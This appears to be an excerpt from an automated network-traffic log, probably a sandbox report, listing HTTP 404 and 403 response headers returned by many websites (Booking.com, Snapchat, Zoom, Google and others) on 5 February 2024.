                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: warriorplus=t7m7koebbgrclahjoueq2ppgn6; expires=Wed, 06-Mar-2024 11:16:10 GMT; Max-Age=2592000; path=/set-cookie: rqtok=2bcfb037a5cc912bf4b2; expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID=hdm0iccqh7q72cs0chp5ek02nm; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTServer: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1446536446601918,0:1)Content-Type: text/html; charset=iso-8859-1Content-Length: 194Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KyiIsQxzBcnRC8Vst6JpG0STONeX81g75LLuK4NLsiEzm84o02uxz01Yy8ISASCGM3TXTnA9s2b0v1lqlGVFOlPwGKq2PpgMQd%2FvKT1yaKExnBd24rhv9W3Th2xq8CmXjhezK%2B8yirJ8h2U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd5c7942b118-ATL
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.26expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 106_HTTP.404,106_404,106_URL.1e5f09d904a9efd2fc928c187452329f,106_x-litespeed-cache: misstransfer-encoding: chunkeddate: Mon, 05 Feb 2024 11:16:10 GMTserver: LiteSpeedplatform: hostingercontent-security-policy: upgrade-insecure-requestsalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=413g84ktdejm8mm0c1531m1bv7; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:11 GMTContent-Type: text/htmlContent-Length: 7358Connection: closeServer: nginx/1.12.2Vary: Accept-EncodingETag: "5df8f9a3-1cbe"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:11 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=226c4f3d552000f1&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgX8c1xrgbYjEjhmvgRFMYCytVNxLTDudX19W6VDmrB7pcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=226c4f3d552000f1&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgX8c1xrgbYjEjhmvgRFMYCytVNxLTDudX19W6VDmrB7p; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-4FoQJYptw226Jz9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 7e1e27db89c10c5d284149b3df2ae272.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: ntyc4_WfB32n94q2xE1WWrnDUQXu-X2wHxszpzuKHWFbC5Kf3wVdHg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffLast-Modified: Mon, 05 Feb 2024 11:16:10 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, no-cache, max-age=0Link: </styles/fonts/fa/fa-regular-400-min.woff2?_v=5.15.3.1706539464>; rel=preload; as=font; crossorigin=anonymousVary: Accept-EncodingSet-Cookie: xf_csrf=lPLfuRkR2S6NPnB3; path=/; secureCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=So9eBhvQPmnTY%2FvHJyqcucVjEzI4S0UFqSkBnbhS0aaHICCEQAU47qDF4vfeM%2FEdxQfGTn7wiY409EtXauCGPyGOMjxa7ySTchg4ODd3oiSjmxzq2%2B0t20X8tSfbndA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd5c795c6777-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:11 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.phonandroid.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Frame-Options: SAMEORIGINX-Backend: k8s-prod2-beCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yQRDLwuCZXsMcMOMH6akPJ67grJMWdAshapPU%2BtcvGUbJUcYM2f2kTwh1wPS8euddvLf0Q2sZsdn05987J0nFSFw8qeU7m2d8rFgvUpoRiJmriD6tez2I1cFjmGXmh4oDhRO7ro0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 850abd5e2b9653fe-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: 169cb534faad350189f757c618bb163aReferrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:12 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=7fd9eb6d-6623-499c-b4bd-3c72bad8503b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:12 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=aw1;rid=WEB_0330e18c9c77fa80b793ad17d9a32752x-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-qxWD7W5jToKGTvJe1Q9q2w' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cachex-imvu-rnd: t9JEtZkUablDLu
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: no-store,no-cachepragma: no-cachetransfer-encoding: chunkedcontent-type: text/html; charset=utf-8server: request-context: appId=cid-v1:72342c18-c46f-45ce-b189-a032422cefbacontent-security-policy: default-src 'self';script-src 'self' 'sha256-7F67Tt3rqGzZ4RuGnAw8xbWeXLl7P0SNrI9EOIYYRdw=' 'nonce-VGkIlrwC+3QyRKgUNfGm9ZbTZRACXydeodCKpguaaQ8=';style-src 'self';font-src 'self' fonts.gstatic.com;img-src 'self' data: https://www.gravatar.com/avatar/;media-src 'none';object-src 'none';frame-ancestors 'self';frame-src 'self';report-uri https://uitgeverijdeviant.report-uri.com/r/t/csp/enforcex-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockx-content-type-options: nosniffreferrer-policy: strict-origin-when-cross-originstrict-transport-security: max-age=31536000; includeSubDomains; preloadX-Powered-By: date: Mon, 05 Feb 2024 11:16:11 GMTset-cookie: SERVERID=api04; path=/; Secureconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:12 GMTServer: Apache/2.4.41 (Ubuntu)Expires: 0Cache-Control: no-cache, no-store, max-age=0, must-revalidateX-Powered-By: JSP/2.2Set-Cookie: JSESSIONID=W9m9qKz7BTe7YTE1DP9qHQ2-.cmrsanmartin; path=/X-XSS-Protection: 1; mode=blockPragma: no-cacheX-Frame-Options: SAMEORIGINX-Robots-Tag: noindex,noarchiveX-Content-Type-Options: nosniffStrict-Transport-Security: max-age=31536000 ; includeSubDomainsContent-Type: text/html;charset=UTF-8Content-Language: es-CLConnection: closeTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportContent-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 850abd68de1744fb-ATLalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeserver: envoydate: Mon, 05 Feb 2024 11:16:12 GMTcontent-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=66eb4f3ea1ce0020&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgYlaHb_J0puoUASp75a9AaRRwRm3ctDSQm_-HPXLzmPfcontent-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=66eb4f3ea1ce0020&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgYlaHb_J0puoUASp75a9AaRRwRm3ctDSQm_-HPXLzmPf; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-FOWWK9SvFjgKUvT' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'x-xss-protection: 1; mode=blockstrict-transport-security: max-age=86400; includeSubDomainsX-Cache: Error from cloudfrontVia: 1.1 bf188cee1e2fac0ecb107645c3d93c9a.cloudfront.net (CloudFront)X-Amz-Cf-Pop: ATL59-P5X-Amz-Cf-Id: wXUZINQaatCd78UWLYkxUD0dijY5KYV3A5pceGZv7rL9-BABEeQvMw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETStrict-Transport-Security: max-age=31536000; includeSubDomainsDate: Mon, 05 Feb 2024 11:16:11 GMTConnection: closeContent-Length: 1245X-CDN: ImpervaX-Iinfo: 8-5685667-5685669 NNNY CT(118 137 0) RT(1707131771639 312) q(0 0 0 -1) r(0 1) U24
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8vary: Accept-Encodingset-cookie: sc-wcid=11e696ca-00e9-4715-9573-2d335896ff37; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:12 GMT; Max-Age=86400; Secureexpires: Thu, 01 Jan 1970 00:00:00 GMTstrict-transport-security: max-age=31536000; includeSubdomainsx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-frame-options: allow-from https://iframe.arkoselabs.comcache-control: no-cache, no-store, max-age=0content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;x-content-security-policy: default-src 'self'; script-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlNgrok-Error-Code: ERR_NGROK_3200Ngrok-Trace-Id: a644e7390d5c8f058211db1c75284620Referrer-Policy: no-referrerDate: Mon, 05 Feb 2024 11:16:12 GMTTransfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 05 Feb 2024 11:17:38 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreportContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreportReport-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:12 GMTContent-Type: text/html;charset=utf-8Transfer-Encoding: chunkedConnection: closex-zm-trackingid: v=2.0;clid=us04;rid=WEB_5efc3c1fe8ebdeded77308ef76196a0bx-content-type-options: nosniffcontent-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-b7H4SGXRSdeaDkA6nzsmWQ' 'unsafe-inline' blob: https:;x-frame-options: SAMEORIGINset-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlyset-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
